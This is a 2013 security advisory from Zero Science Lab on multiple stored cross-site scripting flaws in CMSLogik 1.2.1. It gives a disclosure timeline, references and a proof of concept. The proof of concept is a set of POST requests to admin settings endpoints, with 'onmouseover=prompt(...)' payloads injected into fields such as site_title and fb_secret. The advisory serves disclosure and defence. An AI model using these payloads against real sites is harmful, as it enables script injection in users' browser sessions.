CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities

2013-04-14T00:00:00
ID ZSL-2013-5136
Type zeroscience
Reporter Gjoko Krstic
Modified 2013-04-14T00:00:00

Description

Title: CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities
Advisory ID: ZSL-2013-5136
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 14.04.2013

Summary

CMSLogik is built on a solid & lightweight framework called CodeIgniter, and design powered by Bootstrap. This combination allows for greater security, extensive flexibility, and ease of use. You can use CMSLogik for almost any niche that your project might fall into.

Description

CMSLogik suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Vendor

ThemeLogik - <http://www.themelogik.com/cmslogik>

Affected Version

1.2.1 and 1.2.0

Tested On

Router Webserver

Vendor Status

[05.04.2013] Vulnerability discovered.
[05.04.2013] Contact with the vendor.
[05.04.2013] Vendor replies asking more details.
[05.04.2013] Sent detailed information to the vendor.
[08.04.2013] Vendor confirms the issues promising patch.
[14.04.2013] Public security advisory released.

PoC

cmslogik_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://cxsecurity.com/issue/WLB-2013040105>
[2] <http://www.exploit-db.com/exploits/24959/>
[3] <http://packetstormsecurity.com/files/121303>
[4] <http://osvdb.org/show/osvdb/92322>
[5] <http://osvdb.org/show/osvdb/92323>
[6] <http://osvdb.org/show/osvdb/92324>
[7] <http://osvdb.org/show/osvdb/92325>
[8] <http://osvdb.org/show/osvdb/92326>
[9] <http://xforce.iss.net/xforce/xfdb/83429>
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-3535>
[11] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3535>

Changelog

[14.04.2013] - Initial release
[15.04.2013] - Added reference [1] and [2]
[16.04.2013] - Added reference [3], [4], [5], [6], [7] and [8]
[19.04.2013] - Added reference [9]
[14.05.2013] - Added reference [10] and [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities


Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0

Summary: CMSLogik is built on a solid & lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.

Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.

Tested on: Apache/2.2.22
           PHP/5.3.15


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php


05.04.2013

--

==============================================================================

POST http://localhost/cmslogik/admin/settings HTTP/1.1

admin_email	"onmouseover=prompt("XSS1")&gt;
default_level	2
default_page	1
default_url	http://themelogik.com/cmslogik/
email_activate	0
header_title	"onmouseover=prompt("XSS2")&gt;
login	1
registration	1
site_title	"onmouseover=prompt("XSS3")&gt;
update_settings	Update Settings
welcome_email	0

==============================================================================

POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings	Update
recaptcha_private	"onmouseover=prompt("XSS4")&gt;
recaptcha_public	"onmouseover=prompt("XSS5")&gt;

==============================================================================

POST http://localhost/cmslogik/admin/social_settings HTTP/1.1

fb_appid	"onmouseover=prompt("XSS6")&gt;
fb_secret	"onmouseover=prompt("XSS7")&gt;
social_settings	Update
tw_consumer_key	"onmouseover=prompt("XSS8")&gt;
tw_consumer_secret	"onmouseover=prompt("XSS9")&gt;

==============================================================================

POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid	76
long	test
short	test
slug	"onmouseover=prompt("XSS10")&gt;
status	live
title	test

==============================================================================

POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link	"onmouseover=prompt("XSS11")&gt;
item_name	test
item_order	0
mid	9

==============================================================================